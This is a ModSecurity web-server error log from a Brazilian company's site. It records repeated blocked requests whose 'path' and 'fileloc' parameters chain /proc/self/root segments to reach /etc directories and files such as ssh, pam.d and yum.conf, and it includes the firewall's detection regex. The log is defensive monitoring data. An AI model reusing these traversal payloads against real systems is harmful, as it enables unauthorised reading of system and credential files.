[Mon Mar 16 17:06:02.831552 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:46748] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhiqrABkC4fWIHEf8EKagAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:06:11.810361 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:39968] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhis7ysWC90G-1nBrBZlgAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:06:13.243299 2026] [:error] [pid 29802:tid 140411574073088] [client 74.7.241.46:42042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhitc_BxrYCr4hPDw__jAAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:06:19.232755 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.241.46:42054] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhiu8_BxrYCr4hPDw__mgAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:06:23.342378 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:60528] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhivqTCbgAP5jq5TehCTgAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:06:26.884221 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:60544] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhiwqQpVkWug9HeOt9LdgAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:06:28.193015 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.241.46:46394] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhixLABkC4fWIHEf8EKawAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:06:28.266555 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.228.16:50178] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhixI6lpbStxTqkSkuAAQAAAlc"]
[Mon Mar 16 17:06:35.263004 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.241.46:46404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhiy6TCbgAP5jq5TehCVwAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:06:43.258568 2026] [:error] [pid 29507:tid 140411599251200] [client 74.7.241.46:46420] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhi00r9dMAiw-8KANNc-QAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:07:13.197397 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.243.203:45694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhi8c_BxrYCr4hPDw__9gAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Mon Mar 16 17:07:55.782539 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.241.46:34832] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjG7ysWC90G-1nBrBZ4wAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:08:04.814335 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.241.46:41198] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjJKQpVkWug9HeOt9LhwAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:08:08.367876 2026] [:error] [pid 29507:tid 140411725141760] [client 74.7.241.46:57694] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjKEr9dMAiw-8KANNdCgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:08:55.622377 2026] [:error] [pid 29507:tid 140411741927168] [client 74.7.241.46:52202] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjV0r9dMAiw-8KANNdOgAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:09:00.819166 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:47756] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjXLABkC4fWIHEf8EK5AAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:11.843857 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:35440] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjZ7ABkC4fWIHEf8EK7QAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:09:13.131507 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.243.203:38680] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjac_BxrYCr4hPDw8AJQAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:09:14.737898 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.243.203:38686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjaqQpVkWug9HeOt9LjQAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:09:16.052875 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:38694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjbLABkC4fWIHEf8EK7gAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:17.458637 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:38708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjbbABkC4fWIHEf8EK7wAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:09:18.672877 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:38712] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjbrABkC4fWIHEf8EK8AAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
